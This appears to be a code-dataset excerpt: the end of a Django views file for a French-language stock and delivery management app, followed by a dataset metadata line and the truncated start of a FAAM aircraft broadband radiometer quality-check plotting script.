\n\n\n\n@login_required\n@permission_required('stock.add_transporteur', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef add_transport(request):\n if request.method == 'POST':\n form = TransporteurForm(request.POST)\n if form.is_valid():\n form.save()\n cont_type1 = form.cleaned_data.get('name_transp')\n messages.success(request, f\"{cont_type1} ajouté avec succès!\")\n return HttpResponseRedirect('transport')\n else:\n messages.error(request, \"Veuillez verifiez svpla saisie!\")\n return render(request, 'stock/add_client.html', {'form':form})\n else:\n form = TransporteurForm()\n return render(request, 'stock/add_transport.html', {'form':form})\n\n\n\n\n@login_required\n@permission_required('stock.change_transporteur', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True) \ndef edit_transport(request, id):\n transport = Transporteur.objects.get(id=id)\n if request.method == 'POST':\n form = TransporteurForm(request.POST,request.FILES, instance=transport)\n if form.is_valid():\n form.save(id)\n messages.success(request, f\"Mise à jour {transport.name_transp} ok !\")\n return redirect('transport')\n else:\n form = TransporteurForm(instance=transport)\n return render(request, 'stock/edit_transport.html', {'form':form, \"transport\":transport})\n\n\n\n@login_required\n@permission_required('stock.delete_transporteur', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef delete_transport(request, id):\n transport = Transporteur.objects.get(id=id)\n if request.method=='POST':\n transport.delete()\n messages.success(request, f'{transport.name_transp} supprimé !')\n return redirect(\"transport\")\n return render(request, 'stock/delete_transport.html', {\"transport\":transport})\n\n\n\n\n@login_required\n@permission_required('stock.view_niveau1', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef niveau(request):\n return render(request, 'stock/niveau.html')\n\n@login_required\n@permission_required('stock.add_niveau1', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef create_n1(request):\n niveau1 = Niveau1.objects.all()\n if request.method == 'POST':\n form = Niveau1Form(request.POST)\n if form.is_valid():\n form.save()\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} ajouté avec succès!\")\n return HttpResponseRedirect('create_n1')\n else:\n messages.error(request, \"Veuillez verifiez svpla saisie!\")\n return render(request, 'stock/create_n1.html', {\"niveau1\":niveau1, 'form':form})\n else:\n form = Niveau1Form()\n return render(request, 'stock/create_n1.html', {\"niveau1\":niveau1, 'form':form})\n\n\n\n@login_required\n@permission_required('stock.change_niveau1', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True) \ndef edit_n1(request, id):\n niveau = Niveau1.objects.get(id=id)\n if request.method == 'POST':\n form = Niveau1Form(request.POST,request.FILES, instance=niveau)\n if form.is_valid():\n form.save(id)\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} mis à jour avec succès!\")\n return redirect('create_n1')\n else:\n form = Niveau1Form(instance=niveau)\n return render(request, 'stock/edit_n1.html', {\"niveau\":niveau, 'form':form})\n\n\n@login_required\n@permission_required('stock.add_niveau2', 
login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef create_n2(request):\n niveau2 = Niveau2.objects.all()\n if request.method == 'POST':\n form = Niveau2Form(request.POST)\n if form.is_valid():\n form.save()\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} ajouté avec succès!\")\n return HttpResponseRedirect('create_n2')\n else:\n messages.error(request, \"Veuillez verifiez svpla saisie!\")\n return render(request, 'stock/create_n2.html', {\"niveau2\":niveau2, 'form':form})\n else:\n form = Niveau2Form()\n return render(request, 'stock/create_n2.html', {\"niveau2\":niveau2, 'form':form})\n\n\n\n@login_required\n@permission_required('stock.change_niveau2', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True) \ndef edit_n2(request, id):\n niveau2 = Niveau2.objects.get(id=id)\n if request.method == 'POST':\n form = Niveau2Form(request.POST,request.FILES, instance=niveau2)\n if form.is_valid():\n form.save(id)\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} mis à jour avec succès!\")\n return redirect('create_n2')\n else:\n form = Niveau2Form(instance=niveau2)\n return render(request, 'stock/edit_n2.html', {\"niveau2\":niveau2, 'form':form})\n\n\n\n@login_required\n@permission_required('stock.add_niveau2', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef create_n3(request):\n niveau3 = Niveau3.objects.all()\n if request.method == 'POST':\n form = Niveau3Form(request.POST)\n if form.is_valid():\n form.save()\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} ajouté avec succès!\")\n return HttpResponseRedirect('create_n3')\n else:\n messages.error(request, \"Veuillez verifiez svpla saisie!\")\n return render(request, 'stock/create_n3.html', {\"niveau3\":niveau3, 'form':form})\n else:\n form = Niveau3Form()\n return render(request, 'stock/create_n3.html', {\"niveau3\":niveau3, 'form':form})\n\n\n@login_required\n@permission_required('stock.change_niveau3', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True) \ndef edit_n3(request, id):\n niveau3 = Niveau3.objects.get(id=id)\n if request.method == 'POST':\n form = Niveau3Form(request.POST,request.FILES, instance=niveau3)\n if form.is_valid():\n form.save(id)\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} mis à jour avec succès!\")\n return redirect('create_n3')\n else:\n form = Niveau3Form(instance=niveau3)\n return render(request, 'stock/edit_n3.html', {\"niveau3\":niveau3, 'form':form})\n\n\n\n\n@login_required\n@permission_required('stock.add_niveau4', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef create_n4(request):\n niveau4 = Niveau4.objects.all()\n if request.method == 'POST':\n form = Niveau4Form(request.POST)\n if form.is_valid():\n form.save()\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} ajouté avec succès!\")\n return HttpResponseRedirect('create_n4')\n else:\n messages.error(request, \"Veuillez verifiez svpla saisie!\")\n return render(request, 'stock/create_n4.html', {\"niveau4\":niveau4, 'form':form})\n else:\n form = Niveau4Form()\n return render(request, 'stock/create_n4.html', {\"niveau4\":niveau4, 'form':form})\n\n\n@login_required\n@permission_required('stock.change_niveau4', 
login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True) \ndef edit_n4(request, id):\n niveau4 = Niveau4.objects.get(id=id)\n if request.method == 'POST':\n form = Niveau4Form(request.POST,request.FILES, instance=niveau4)\n if form.is_valid():\n form.save(id)\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} mis à jour avec succès!\")\n return redirect('create_n4')\n else:\n form = Niveau4Form(instance=niveau4)\n return render(request, 'stock/edit_n4.html', {\"niveau4\":niveau4, 'form':form})\n\n\n\n\n@login_required\n@permission_required('stock.add_niveau5', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef create_n5(request):\n niveau5 = Niveau5.objects.all()\n if request.method == 'POST':\n form = Niveau5Form(request.POST)\n if form.is_valid():\n form.save()\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} ajouté avec succès!\")\n return HttpResponseRedirect('create_n5')\n else:\n messages.error(request, \"Veuillez verifiez svpla saisie!\")\n return render(request, 'stock/create_n5.html', {\"niveau5\":niveau5, 'form':form})\n else:\n form = Niveau5Form()\n return render(request, 'stock/create_n5.html', {\"niveau5\":niveau5, 'form':form})\n\n\n@login_required\n@permission_required('stock.change_niveau5', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True) \ndef edit_n5(request, id):\n niveau5 = Niveau5.objects.get(id=id)\n if request.method == 'POST':\n form = Niveau5Form(request.POST,request.FILES, instance=niveau5)\n if form.is_valid():\n form.save(id)\n cont_type = form.cleaned_data.get('name')\n messages.success(request, f\"{cont_type} mis à jour avec succès!\")\n return redirect('create_n5')\n else:\n form = Niveau5Form(instance=niveau5)\n return render(request, 'stock/edit_n5.html', {\"niveau5\":niveau5, 'form':form})\n\n\n\n\n@login_required \n@permission_required('stock.add_commande', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef commande(request):\n if request.method == 'POST':\n supplier_id = request.POST.get('fournisseur')\n supplier = Client.objects.get(pk=supplier_id)\n adresse_livraison = request.POST.get('adresse_livraison')\n date_commande = request.POST.get('date_commande')\n num_commande = request.POST.get('num_commande')\n transport_id = request.POST.get('transport')\n transport = Transporteur.objects.get(pk=transport_id)\n commande = Commande.objects.create(client=supplier,\n date_commande=date_commande,\n adresse_livraison=adresse_livraison,\n num_commande=num_commande,\n transport=transport\n )\n selected_products = request.POST.getlist('articles')\n number = 0\n with transaction.atomic():\n for article_id in selected_products:\n number += 1\n quantity = int(request.POST.get(f'quantity-{number}'))\n article = Product.objects.get(id=article_id)\n # Vérifiez si la quantité demandée est disponible\n if article.stock >= quantity:\n article.stock = models.F('stock') - quantity\n article.save()\n\n LigneCommande.objects.create(commande=commande,\n article=article,\n quantite=quantity)\n\n else:\n # Si la quantité n'est pas disponible, annulez la commande et affichez un message d'erreur\n commande.delete()\n messages.error(request, f\"La quantité demandée pour '{article.name}' n'est pas disponible.\")\n\n return redirect('livraison')\n\n Livraison.objects.create(commande=commande,\n num_livraison=commande.num_commande,\n 
livre=False,\n )\n\n messages.success(request, 'Votre commande a été passée avec succès!')\n return redirect('livraison')\n\n else:\n articles = Product.objects.all()\n suppliers = Client.objects.all()\n transports = Transporteur.objects.all()\n prefixe = 'CMD-'\n idc = f'{Commande.objects.count()+1:05d}'\n suffixe = date.today()\n sep = '-'\n num_commande = prefixe + idc + sep + str(suffixe)\n context = {'articles': articles, \"suppliers\":suppliers, \"transports\":transports, \"num_commande\":num_commande}\n return render(request, 'stock/commande.html', context)\n\n\n\n\n@login_required\n@permission_required('stock.view_commande', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef print_commande(request, pk):\n commande_print = Livraison.objects.get(pk=pk)\n com_id = commande_print.id\n ma_commande = get_object_or_404(Commande, id=com_id)\n article_commandes = LigneCommande.objects.filter(commande=ma_commande)\n nbr_items = article_commandes.count()\n context={\"article_commandes\":article_commandes, \"ma_commande\":ma_commande, \"nbr_items\":nbr_items}\n return render(request, 'stock/print_commande.html', context)\n\n\n\n@login_required\n@permission_required('stock.view_commande', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef print_commande2(request, pk):\n commande_print = Livraison.objects.get(pk=pk)\n com_id = commande_print.id\n ma_commande = get_object_or_404(Commande, id=com_id)\n article_commandes = LigneCommande.objects.filter(commande=ma_commande)\n context={\"article_commandes\":article_commandes, \"ma_commande\":ma_commande}\n return render(request, 'stock/print_commande2.html', context)\n\n\n\n@login_required\n@permission_required('stock.view_commande', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef livraison(request):\n livraisons = Livraison.objects.filter(livre=False).order_by('-id')\n paginator = Paginator(livraisons, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context={\"page_obj\":page_obj}\n return render(request, 'stock/livraison.html', context)\n\n\n@login_required\n@permission_required('stock.change_commande', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef edit_livraison(request, livraison_id):\n livraison = get_object_or_404(Livraison, id=livraison_id)\n commande = livraison.commande\n form = LivraisonForm(request.POST or None, instance=livraison)\n if form.is_valid():\n livraison = form.save(commit=False)\n commande.save()\n livraison.livre = True\n livraison.save()\n messages.success(request, 'Votre commande a été livré avec succès!')\n return redirect('suivi')\n return render(request, 'stock/edit_livraison.html', {'form': form, 'livraison': livraison})\n\n\n\n@login_required\n@permission_required('stock.change_commande', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef edit_livraison2(request, livraison_id):\n livraison = get_object_or_404(Livraison, id=livraison_id)\n return render(request, 'stock/edit_livraison2.html', {'livraison': livraison})\n\n\n\n\n\n@login_required\n@permission_required('stock.view_product', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef produit(request):\n articles = Product.objects.all().order_by('-id')\n paginator = Paginator(articles, 5)\n page_number = request.GET.get('page')\n 
page_obj = paginator.get_page(page_number)\n context={\"page_obj\":page_obj}\n return render(request, 'stock/produit.html', context)\n\n@login_required\n@permission_required('stock.view_product', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef stock_barre(request):\n barcode = request.GET.get('barcode')\n if barcode:\n product = get_object_or_404(Product, barcode=barcode)\n data = {\n 'name': product.name,\n 'code': product.code,\n 'stock': product.stock,\n 'description': product.description,\n 'sous_contenaire': str(product.sous_contenaire),\n 'barcode': product.barcode.url if product.barcode else '',\n }\n return JsonResponse(data)\n return render(request, 'stock/stock_barre.html')\n\n\n\n@login_required\n@permission_required('stock.add_product', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef add_product(request):\n year = datetime.datetime.now().year\n code = f'ARTI-{Product.objects.count()+1:09d}-{year}'\n if request.method==\"POST\":\n form = ProductForm(request.POST)\n if form.is_valid():\n product = form.save(commit=False)\n product.code = code\n product.save()\n pro_code = form.cleaned_data.get('code')\n nom_pro = form.cleaned_data.get('name')\n messages.success(request, f\"L'élément {nom_pro} code {pro_code} ajouté avec succes !\")\n return HttpResponseRedirect('produit')\n else:\n messages.error(request, \"Veuillez verifiez svp l'article existe déja!!\")\n return render(request, 'stock/add_product.html', {\"form\":form})\n else:\n form = ProductForm(initial={'code': code})\n return render(request, 'stock/add_product.html', {\"form\":form})\n \n@login_required\n@permission_required('stock.change_product', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef edit_product(request, id):\n product = get_object_or_404(Product, id=id)\n if request.method == 'POST':\n form = ProductForm(request.POST,request.FILES, instance=product)\n if form.is_valid():\n form.save(id)\n messages.success(request, f\"Mise à jour {product.code} ok !\")\n return redirect('produit')\n else:\n form = ProductForm(instance=product)\n return render(request, 'stock/edit_product.html', {'form':form})\n\n\n\n\n@login_required\n@permission_required('stock.delete_product', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True) \ndef delete_product(request, id):\n product = Product.objects.get(id=id)\n if request.method=='POST':\n product.delete()\n messages.success(request, f'{product.code} supprimé !')\n return redirect(\"produit\")\n return render(request, 'stock/delete_product.html', {\"product\":product})\n\n\n\nclass SearchProductView(View):\n def get(self, request, *args, **kwargs):\n code = request.GET.get('code')\n products = Product.objects.filter(code__icontains=code)\n data = {\n 'products': list(products.values('name'))\n }\n return JsonResponse(data)\n\n\n\n \n@login_required\n@permission_required('stock.view_operation', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef stock_in(request):\n operations = Operation.objects.all().order_by('-id')\n paginator = Paginator(operations, 5)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context={\"page_obj\":page_obj}\n return render(request, 'stock/stock_in.html', context)\n\n\n@login_required\n@permission_required('stock.add_operation', 
login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef add_stock(request):\n if request.method == 'POST':\n supplier_id = request.POST.get('fournisseur')\n supplier = Client.objects.get(pk=supplier_id)\n operation = Operation.objects.create(fournisseur=supplier\n )\n number = 0\n selected_products = request.POST.getlist('products')\n with transaction.atomic():\n for product_id in selected_products:\n number += 1\n quantity = int(request.POST.get(f'quantity-{number}'))\n product = Product.objects.get(id=product_id)\n # Vérifiez si la quantité demandée est disponible\n if quantity >= 1:\n product.stock = models.F('stock') + quantity\n product.save()\n LigneOperation.objects.create(operation=operation,\n product=product,\n quantity=quantity)\n \n else:\n # Si la quantité n'est pas disponible, annulez la commande et affichez un message d'erreur\n operation.delete()\n messages.error(request, f\"La quantité {product.code} doit être superieure à au moin 1 \")\n\n return redirect('stock_in')\n\n \n\n messages.success(request, 'Votre stock à été mise à jour avec succès!')\n return redirect('stock_in')\n\n else:\n products = Product.objects.all()\n suppliers = Client.objects.all()\n context = {'products': products, 'suppliers': suppliers}\n return render(request, 'stock/add_stock.html', context)\n \n \n \n# @login_required\n# @cache_control(no_cache=True, must_revalidate=True, no_store=True)\n# def add_stock(request):\n# if request.method == 'POST':\n# selected_products = request.POST.getlist('products')\n# for product_id in selected_products:\n# quantity = int(request.POST.get('quantity'))\n# supplier_id = request.POST.get('fournisseur')\n# supplier = Client.objects.get(pk=supplier_id)\n# product = Product.objects.get(pk=product_id)\n# if quantity >= 1:\n# product.stock += quantity\n# product.save()\n# operation = Operation(\n# products=product,\n# quantity=quantity,\n# fournisseur=supplier\n# )\n# operation.save()\n# messages.success(request, f\"Le stock {product} mis à jour avec succes !\")\n# else:\n# messages.error(request, f\" veuillez verifiez la quantité saisie\")\n \n# return redirect('stock_in')\n\n# products = Product.objects.all()\n# suppliers = Client.objects.all()\n# context = {'products': products, 'suppliers': suppliers}\n# return render(request, 'stock/add_stock.html', context)\n\n \n@login_required\n@permission_required('stock.view_operation', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef operation_print(request, id):\n op_id = Operation.objects.get(id=id)\n operations_lignes = LigneOperation.objects.filter(operation_id=op_id)\n context={\"operations_lignes\":operations_lignes, \"op_id\":op_id}\n return render(request, 'stock/operation_print.html', context)\n\n\n\n\n@login_required\n@permission_required('stock.view_livraison', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef suivi(request):\n livraisons = Livraison.objects.all().filter(livre=True).order_by('-id')\n paginator = Paginator(livraisons, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context={\"page_obj\":page_obj}\n return render(request, 'stock/suivi.html', context)\n\n\n\n\nclass ExportProductsCSVView(View):\n \n def get(self, request, *args, **kwargs):\n products = Product.objects.all()\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"products.csv\"'\n\n writer = 
csv.writer(response)\n writer.writerow(['ID', 'Code', 'Name', 'Stock', 'Niveau', 'Description'])\n\n for product in products:\n writer.writerow([product.id, product.code, product.name, product.stock, product.sous_contenaire, product.description])\n\n return response\n\n\n\n\nclass ExportProductsExcelView(View):\n \n def get(self, request, *args, **kwargs):\n products = Product.objects.all()\n\n workbook = openpyxl.Workbook()\n worksheet = workbook.active\n worksheet.title = \"Products\"\n\n # Écrire les en-têtes de colonne\n worksheet.cell(row=1, column=1, value=\"ID\")\n worksheet.cell(row=1, column=2, value=\"Code\")\n worksheet.cell(row=1, column=3, value=\"Name\")\n worksheet.cell(row=1, column=4, value=\"Stock\")\n worksheet.cell(row=1, column=5, value=\"Niveau\")\n worksheet.cell(row=1, column=6, value=\"Description\")\n # Écrire les données des produits\n row_num = 2\n for product in products:\n worksheet.cell(row=row_num, column=1, value=product.id)\n worksheet.cell(row=row_num, column=2, value=product.code)\n worksheet.cell(row=row_num, column=3, value=product.name)\n worksheet.cell(row=row_num, column=4, value=product.stock)\n worksheet.cell(row=row_num, column=5, value=product.sous_contenaire.name)\n worksheet.cell(row=row_num, column=6, value=product.description)\n row_num += 1\n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = 'attachment; filename=\"products.xlsx\"'\n workbook.save(response)\n return response\n\n\n\n# @login_required\n# @cache_control(no_cache=True, must_revalidate=True, no_store=True)\n# def print_label(product):\n# #Crée un objet d'imprimante USB\n# printer = Usb(0x0416, 0x5011, 0, profile=\"POS-5890\")\n# #Configure l'imprimante pour une étiquette de 50 mm de largeur\n# printer.set(\"CENTER\")\n# printer.set(\"SIZE\", 1, 1)\n# printer.set(\"GAP\", 2)\n# #Imprime le nom du produit\n# printer.text(product.name + \"\\n\")\n# #Génère le code-barres et l'imprime\n# barcode_data = generate_barcode(product.number)\n# printer.barcode(barcode_data, \"CODE128\", 64, 2, '', '')\n# #Imprime le numéro de produit et la quantité\n# printer.text(\"Product number: \" + product.number + \"\\n\")\n# printer.text(\"Quantity: \" + str(product.quantity) + \"\\n\")\n# #Coupe le papier pour terminer l'étiquette\n# printer.cut()\n# #Ferme l'objet d'imprimante USB\n# printer.close()\n# return HttpResponse(\"Label printed successfully.\")\n \n\n\n# @login_required\n# @cache_control(no_cache=True, must_revalidate=True, no_store=True)\n# def product_label(request, product_id):\n# #Récupère l'objet Produit correspondant à l'ID donné\n# product = Product.objects.get(pk=product_id)\n# #Imprime une étiquette pour le produit\n# print_label(product)\n# #Redirige l'utilisateur vers la page de détails du produit\n# return redirect('product_detail', product_id=product_id)\n\n\n\n@login_required\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef acces_denied(request):\n return render(request, 'stock/acces_denied.html')\n\n\n \n","repo_name":"Laurentzo1992/stock-barre","sub_path":"stock/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":32905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"27128329295","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nQuality Assurance-Quality Check (QA-QC) plotting for the FAAM Core Broadband\nRadiometers (BBRs, pyranometers and pyrogeometers)\n\n\nLayout (landscape):\n\n 
-------------------------------------------\n | GPS Altitude |\n -------------------------------------------\n -------------------------------------------\n | Sun position |\n -------------------------------------------\n | |\n | Time series of longwave radiation; |\n | from pyrgeometers |\n -------------------------------------------\n -------------------------------------------\n | |\n | Time series of shortwave radiation; |\n | from pyranometers |\n -------------------------------------------\n\nCreated on Wed Apr 27 10:30:53 2016\n\n@author: Poppy Townsend\n\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport sys\n\nfrom general import *\nfrom utils import *\nfrom style import *\n\n\nVARIABLE_NAMES = ['Time', ## Time of measurement (seconds since midnight on start date)\n 'WOW_IND', ## Weight on wheels indicator\n 'ALT_GIN', ## GPS altitude from the GIN\n 'LON_GIN', ## GPS longitude from the GIN\n 'LAT_GIN', ## GPS latitude from the GIN\n 'PS_RVSM', ## static pressure\n 'SW_DN_C', ## Corrected downward short wave irradiance, clear dome\n 'RED_DN_C', ## Corrected downward short wave irradiance, red dome\n 'SW_UP_C', ## Corrected upward short wave irradiance, clear dome\n 'RED_UP_C', ## Corrected upward short wave irradiance, red dome\n 'IR_UP_C', ## Corrected upward longwave irradiance (CGR4)\n 'IR_DN_C', ## Corrected downward longwave irradiance (CGR4)\n 'HDG_GIN', ## Aircraft Heading from the GIN\n 'SOL_AZIM', ## Sun azimuth angle in degrees\n 'SOL_ZEN'] ## Sun zenith angle in degrees\n\n\ndef calc_sun_position(data):\n \"\"\"\n Creates time series plot for the sun position.\n 0: sun on the nose\n 90: sun starboard\n 180: sun on the tail\n 270: sun on port side\n\n :param ax: axes object\n :param data: data dictionary\n\n \"\"\"\n # sun position in reference to the aircraft heading\n # 0: sun on the nose\n # 90: sun starboard\n # 180: sun from behind\n # 270: sun on port side\n sp = data['SOL_AZIM'][:].ravel()-data['HDG_GIN'][:, 0].ravel()\n sp[sp < 0] += 360.0\n data['sun_position'] = sp\n return data\n\n\ndef plot_sun_position(ax, data):\n \"\"\"\n Creates time series plot for the sun position.\n 0: sun on the nose\n 90: sun starboard\n 180: sun on the tail\n 270: sun on port side\n\n :param ax: axes object\n :param data: data dictionary\n\n \"\"\"\n # sun position in reference to the aircraft heading\n # 0: sun on the nose\n # 90: sun starboard\n # 180: sun from behind\n # 270: sun on port side\n ax.plot_date(data['mpl_timestamp'][:, 0].ravel(),\n data['sun_position'],\n '-', lw=2, label='Sun position')\n ax.set_ylim(0, 360)\n ax.yaxis.set_ticks(np.arange(0.0, 361.0, 90.0))\n ax.legend(loc='upper right')\n plt.setp(ax.get_xticklabels(), visible=False)\n return ax\n\n\ndef calc_clearsky_irradiance(data, step=30):\n # see: http://pvlib-python.readthedocs.io/en/latest/index.html\n\n try:\n import pvlib\n PVLIB_MODULE = True\n except:\n PVLIB_MODULE = False\n sys.stdout.write('module pvlib not available ...\\n')\n return data\n\n times = mpl.dates.num2date(data['mpl_timestamp'][:, 0].ravel())\n # pvlib needs a pandas DatetimeINdex\n times = pd.DatetimeIndex(times)\n\n idata = zip(data['LAT_GIN'][::step, 0],\n data['LON_GIN'][::step, 0],\n data['ALT_GIN'][::step, 0],\n data['PS_RVSM'][::step, 0]*100., # convert to Pascal\n times[::step])\n\n n = len(idata)\n # TODO: Need to find sensible values for those two parameters\n aod700 = [0.02]*n\n precipitable_water = [0.5]*n\n\n 
apparent_elevation = [float(pvlib.solarposition.get_solarposition(t, lat, lon, altitude=alt)['apparent_elevation']) for lat, lon, alt, press, t in idata]\n lat, lon, alt, press, times = zip(*idata)\n dayofyear = [t.dayofyear for t in times]\n dni_extra = [pvlib.irradiance.extraradiation(d) for d in dayofyear]\n\n iput = zip(apparent_elevation, aod700,\n precipitable_water, press, dni_extra)\n\n solis = [pvlib.clearsky.simplified_solis(i[0], i[1], i[2], i[3], i[4]) for i in iput]\n # see https://firstgreenconsulting.wordpress.com/2012/04/26/differentiate-between-the-dni-dhi-and-ghi/\n ghi = [s['ghi'] for s in solis] # global horizontal irradiance\n dni = [s['dni'] for s in solis] # direct normal irradiance\n dhi = [s['dhi'] for s in solis] # diffuse horizontal irradiance\n data['clearsky_irradiance_ghi'] = ghi\n data['clearsky_irradiance_dni'] = dni\n data['clearsky_irradiance_dhi'] = dhi\n data['clearsky_irradiance_stepsize'] = step\n return data\n\n\ndef plot_altitude(ax, data):\n \"\"\"\n Time series plot of the GPS altitude\n\n :param ax: axes object\n :param data: data dictionary\n \"\"\"\n alt = data['ALT_GIN'][:, 0].ravel()/1000.\n ax.plot_date(data['mpl_timestamp'][:, 0].ravel(), alt, '-', lw=2, label='GPS alt')\n ax.set_ylabel('alt (km)')\n ax.legend(loc='upper right')\n plt.setp(ax.get_xticklabels(), visible=False)\n return ax\n\n\ndef plot_clearsky_irradiance(ax, data):\n # see: http://pvlib-python.readthedocs.io/en/latest/index.html\n\n step = data['clearsky_irradiance_stepsize']\n _ylim = ax.get_ylim()\n timestamp = data['mpl_timestamp'][::step, 0].ravel()\n ghi = data['clearsky_irradiance_ghi']\n ax.plot_date(timestamp, ghi,\n '-', color='0.3', lw=4, label='max irradiance', alpha=0.5)\n ax.set_ylim(_ylim)\n\n\ndef plot_pyranometers_ts(ax, data):\n \"\"\"\n Time series plot for the fitted pyranometers (clear & red).\n\n :param ax: axes object\n :param data: data dictionary\n \"\"\"\n pars = [('SW_DN_C', 'downward, clear dome'),\n ('RED_DN_C', 'downward, red dome'),\n ('SW_UP_C', 'upward, clear dome'),\n ('RED_UP_C', 'upward, red dome')]\n\n for p in pars:\n if p[0] in data.keys():\n ax.plot_date(data['mpl_timestamp'][:, 0].ravel(),\n data[p[0]][:, 0].ravel(),\n '-', label=p[1])\n ax.legend(loc='upper right')\n ax.text(0.05, 0.98,\n 'Pyranometers - corrected shortwave irradiance',\n axes_title_style, transform=ax.transAxes)\n ax.set_ylabel('Irradiance (W m -2)')\n ax.set_xlabel('Time (utc)')\n yl = ax.get_ylim()\n if yl[0] < -50:\n ax.set_ylim(-50, yl[1])\n if yl[1] > 1500:\n ax.set_ylim(yl[0], 1500)\n hourloc = mpl.dates.HourLocator()\n xtickformat = mpl.dates.DateFormatter('%H:%M')\n ax.xaxis.set_major_locator(hourloc)\n ax.xaxis.set_major_formatter(xtickformat)\n return ax\n\n\ndef plot_pyrgeometers_ts(ax,data):\n \"\"\"\n Creates timeseries plot for the pyrgeometers\n\n \"\"\"\n # these are yet to be fitted; will update to include when ready.\n plt.setp(ax.get_xticklabels(), visible=False)\n ax.text(0.05, 0.98,\n 'Pyrgeometers - corrected longwave irradiance',\n axes_title_style,\n transform=ax.transAxes)\n ax.set_ylabel('Irradiance (W m -2)')\n yl = ax.get_ylim()\n if yl[1] > 1500:\n ax.set_ylim(yl[0], 1500)\n ax.legend()\n return ax\n\n\ndef main(ds):\n \"\"\"\n Creates an overview plot for the BBR instruments; pyranometers and pyrogeometers.\n It calls all plotting functions and sets up axes layout.\n\n \"\"\"\n\n data = get_data(ds, VARIABLE_NAMES)\n data = calc_sun_position(data)\n data = calc_clearsky_irradiance(data)\n\n # Check if Pyrgeometer data are available\n 
pyrgeometers_fitted = False\n try:\n pyrgeometer_data = np.array(data['IR_DN_C'])\n pyrgeometer_data = pyrgeometer_data[(pyrgeometers_data > 0) & \\\n (pyrgeometer_data < 200)]\n\n if pyrgeometer_data.size > 3600:\n pyrgeometers_fitted = True\n else:\n pyrgeometers_fitted = False\n except:\n pass\n\n if pyrgeometers_fitted:\n gs = gridspec.GridSpec(4, 1, wspace=0.05, height_ratios=[1, 1, 4, 4])\n fig = QaQc_Figure(landscape=True).setup()\n\n fig.add_subplot(gs[3, :])\n fig.add_subplot(gs[2, :], sharex=fig.get_axes()[0])\n fig.add_subplot(gs[1, :], sharex=fig.get_axes()[0])\n fig.add_subplot(gs[0, :], sharex=fig.get_axes()[0])\n plot_pyranometers_ts(fig.get_axes()[0], data)\n if 'clearsky_irradiance_ghi' in data.keys():\n plot_clearsky_irradiance(fig.get_axes()[0], data)\n plot_pyrgeometers_ts(fig.get_axes()[1], data)\n plot_sun_position(fig.get_axes()[2], data)\n plot_altitude(fig.get_axes()[3], data)\n else:\n gs = gridspec.GridSpec(3, 1, wspace=0.1, height_ratios=[1, 1, 6])\n fig = QaQc_Figure(landscape=True).setup()\n\n fig.add_subplot(gs[2, :])\n fig.add_subplot(gs[1, :], sharex=fig.get_axes()[0])\n fig.add_subplot(gs[0, :], sharex=fig.get_axes()[0])\n plot_pyranometers_ts(fig.get_axes()[0], data)\n if 